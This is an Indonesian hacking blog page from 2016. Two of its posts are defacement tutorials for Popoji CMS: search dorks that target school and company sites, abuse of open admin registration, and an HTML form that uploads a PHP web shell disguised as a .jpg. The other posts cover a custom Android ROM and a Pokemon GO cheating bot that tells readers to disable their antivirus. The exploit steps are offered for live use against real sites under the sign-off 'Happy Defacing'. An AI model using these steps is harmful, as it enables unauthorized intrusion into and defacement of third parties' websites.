Minggu, 31 Juli 2016

Cara Upload Shell di CMS Popoji

Hello World ; Malam Fans, Please Say Hello Haters ;*
Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirnye dah bisa upload shell wkwk <(")
ya riset upload shell ini gua dapet dari indoXploit *uihh galak inii para sesepuh, ngerisetnye ampe jozz >3<"
Sebelumnye Baca ini dulu: Deface Website berbasis CMS Popoji Lewat Register Account

okeii kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin


kalo dah Login, langsung buka URL bug/vuln di: 
target.c0li/po-admin/js/plugins/uploader/upload.php

Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee
CSRF Code:

<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

* save dgn ekstensi .html
* lalu bukak dengan browser kalean.

upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.

jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali.

Terus cara tau Letak Shell nye Piye Om o.O ??


buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..


akses shell: 
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php


Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji

Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih


Source and Thanks to: indoXploit


./Nuenomaru

Kami ada dan Berkarya, bukan utk disanjungi kok ^_^


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

CARA GANTI CUSTOM ROM CYNAMOGEN 13.0 DI LENOVO A7000

yo ketemu lagi dengan gua elskyace udah sekian lama gua ga nulis artikel kali ini gua akan bahas cara ganti custom rom di lenovo a7000 walaupun ini sendiri bukan buatan gua tapi gua akuin ini rom keren bgt gambar hanya pemanis  
ya langsung aja kita mulai pertama siapkan dulu bahan2nya 

FIX
-smoothies
-Camera
-Audio only via headset
-Audio call fix
-sensor
-double tab 

BUGS
-Audio loudspeaker

caranya pertama wipe data dulu oh iya sebelum flash pastikan sudah terpasang recovery cwm/twrp gue sendiri sih pake twrp karena lebih enak aja balik lagi ke awal pertama wipe data 



tungguin sampai selesai kalo udah selesai press back dan lalu pilih install



tungguin aja sampai selesai kalo udah selesai plih install yg di kotakin warna hijau lalu pilih custom rom oh iya bahan2nya taro di sd card ya jangan sampe lupa lalu tunggu sampai selesai lalu pilih install lagi lalu pilih xperia keyboardnya tunggu juga sampai selesai emang rada lama pas install sabar aja dan kalo sudah selesai semuanya pilih reboot system 
lalu akan masuk sampai ke gambar ini



 




sekian dan terima kasih saya mengucapkan terima kasih buat om nobita iful dan untuk group official lenovo a7000 indonesia  

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Jumat, 29 Juli 2016

Farming Pokemon GO dengan BOT



Yoo , Back with me again #OepilCore
long time no see , kwkwkw~ udah lumayan juga beberapa hari gak posting di blog , baru tadi dapet tutorial bagus dan emang joss banget nih kwkwkw ,

oke kali ini gua bakalan share tutorial tentang bagaimana caranya lu farming pokemon go tanpa harus nangkep , dan role pokestop sendiri ,
yap~ , kali ini gua share tentang BOT~ kwkwkwk ,


sebelumnya gua pernah share tutorial tentang
Fake Gps On Pokemon Go 

dan juga om Init.N bikin tutorial tentang tips dan trik pokemon go

oke , langsung cek tutorialnya yoo~


apa sih kelebihan bot itu ?
ya kaya gini ajah deh saya jelasin ,


  • Multi-Account Bot
  • Auto Farms PokeStops
  • Auto Catches Pokemons
  • Auto Evolves Pokemons
  • Auto Recycle Items
  • HumanWalk Logic
  • Anti Softban

mungkin ini tutorial sekedar iseng atau bisa dibilang perusak game kwkwkw,
karena dengan adanya cara kek gini orang makin pada mager keluar rumah kwkwkwkw~

langsung simak ajah nih ya Ssnya ,



untuk saat ini kalian bisa download dan ekstrak pokecrotnya kwkwkw ,
dan jalankan pokemongo.rocketapi.console.exe , dengan cara klik kanan dan run as administrator ,

eiittss , jangan lupa matikan antivirusnya yoo ~


setelah dibuka kalian bisa lihat kotak merah bernomor satu disana ,
ya itu adalah info tentang akun kita ,
kalian bisa login menggunaka 2 akun ,
1. Google
2. Ptc ( pokemon Trainer Club)


untuk selanjutnya kalian bisa lihat di kotak merah bernomor 2 ,
disitu kalian bisa mengubah lokasi kalian semau kalian , jangan takut terkena softbaned ,
karena software tersebut akan menetralisir kembali akun anda setelah terkan softbaned , dan bisa lanjut farming lagi deh kwkwkkw~

kalian bisa set location , dan akan keluar pop up windows map ,
kalian tinggal pilih lokasi yang kalian suka ,
dan di bawahnya ada speed dan move radius , disitu kalian bisa setting menjadi 30-50 untuk berjalan dengan normal ,

jadi jarak itu adalah , antara pokestop 1 ke pokestop berikutnya ,


untuk di kotak merah bernomor 3 terdapat Bot setting ,
dimana ini adalah pengaturan untuk bot yang kita gunakan , kalian bisa checklist auto transfer untuk melakukan transfer secara otomatis ,
dan memilih paling banyak berapa yang pokemon sama yang terdapat di dalam tas kita ...
sisanya kaian pasti tau deh ya , masa gak paham bahasa inggris ? kwkwkwkwkw~
jangan cuman tau oh my god , yes oh no dan bokep lainnya kwkwkw~


untuk kotak merah bernomor 4 , disitu terdapat settingan item di tas kita ,
Dimana kalian bisa mengatur apa saja yang kalian dapatkan disetiap pokestop ,




untuk pengaturan di kotak nomor 5 ,6 ,7
yaitu terdapat pengaturan , pokemon yang jangan di transfer  , dan pokemon yang jangan di tangkap , serta pokemon yang bisa di evolve ,
jadi disini kalian bisa setting disitu sesuka hati kalian ,

setelah itu , bisa save configuration dan tinggal jalankan deh ,

maka akan muncul ss sperti berikut ini



kwkwkwkwk maaf kalo rada gak jelas keterangannya karena emang menurut gua ini tutor begitu begitu doang kwkwkw pasti paham deh kalo udah ngeliat aplikasi ini ~

and then , see you on next article ,
kwkwkw maaf bila ada kesalahan kata gua #OepilCore , dan tetap semangat semuanya kwkwkw (jangan lupa onani kwkwkw)

OHIYEE , UNTUK LINK DOWNLOAD BISA KLIK DIMARI :
official : Croottss~
google drive tkjcyberart
THANKS TO : 
POKECROT



Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Kamis, 28 Juli 2016

Deface Website berbasis CMS Popoji Lewat Register Account


Hello World ; Pagii Fans, Please Say Hello Haters ;*
xixihi, Lanjut Walking Blog geenggs. Kali ini Gua bakal Share artikel Sumbangan dari Keluarga Dumay gua, yaitu Bang GunshootCbr *Tengkyuh ster (-/\-)
Hahaha, artikel tutorial Kali ini bakal Bahas salah satu Bug/Celah yang ada pada Website yang memakai CMS Popoji.
bingung sih mau kasih Judul ini eXploit apaan, yaudeh:
Cara Deface Website yang Memakai CMS Popoji Lewat Register Account, atauu eXploit Register Account CMS Popoji, au ah Kecot wkwkwk :p

Perkenalan:
CMS Popoji adalah CMS yang dibuat Oleh para programer Indonesia (karya anak Bangsa).
Bug ini terletak Pada Halaman Login pada CMS Popoji *secara default memang cms ini menyediakan Layanan Registrasi akun dan tidak memfilternya. *Hahaha, Kek Com_User di joomla & WP add Admin di Wordpress yak o.O ?
Hahaha jadi karna ini CMS buatan Indonesia, dan besar kemungkinan website yg memakai cms ini adalah website dari indo juga, yaa jan terlalu Hyper yoo Lakonin ini eXploit :)

Lanjut intip tutor ;*

Dork:
inurl:"/detailpost site:sch.id"
Inurl:/detailpost site:.co.id
Powered by Popoji
© popojicms
(Selebihnye kembangin bae nih dork, biar dapet yang vuln n verawan)

eXploit:
target.coli/[path]/po-admin

1. Dorking menggunakan Search Engine

2. Pilih target kalian lalu masuk ke page Login atau masukan eXploitnye.
contoh: nueno.c0li/po-admin

Kalau ada click one for free silahkan dilanjuti, kalo gak ada silahkan cari target laen br0 ;)


Langsung bae, Klik tulisan "Click one for free"
3. kalian akan dihadapkan Oleh Form Register.
Silahkan diisi datanyee yang Valid yoo :v , ngasal tapi jozz ke email wkkw


Langsung Klik Register Account
4. Nah akan Muncul page ini :D , Jika muncul page ini kemungkinan besar kalean berhasil MengExploitasi


Kurang Lebih sih gitu~
5. Lanjut cek email yang kalean buat daftar tadi, cek di spam or kontak masuk.
disitu lengkap tertera id dan password, Lalu klik Link yang tertera Untuk memVerif email kalean ke web target.



6. Success : Your account have been ACTIVATED ! wew wkwkw, langsung bae masukin id n password Lu dan Login :D



7. dan BooM masuk ke halaman Dasbor website target :)

kalo dah kek gini, kalo bisa Laporin Bug nya aja ke miminnya :v
Cara Upload Shell Nya o.O ??
Silahkan bacaaa artikel kite yang ini : Cara Upload Shell di CMS Popoji

Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji

Sekian Tutorial Deface POPOJI CMS Arbitrary File Upload
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih


Source and Thanks to: GunshootCbr


./Nuenomaru



tidak perlu muncul ke permukaan , yang penting tetap bergerilya




Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i
 

ande ande lumoet Template by Ipietoon Cute Blog Design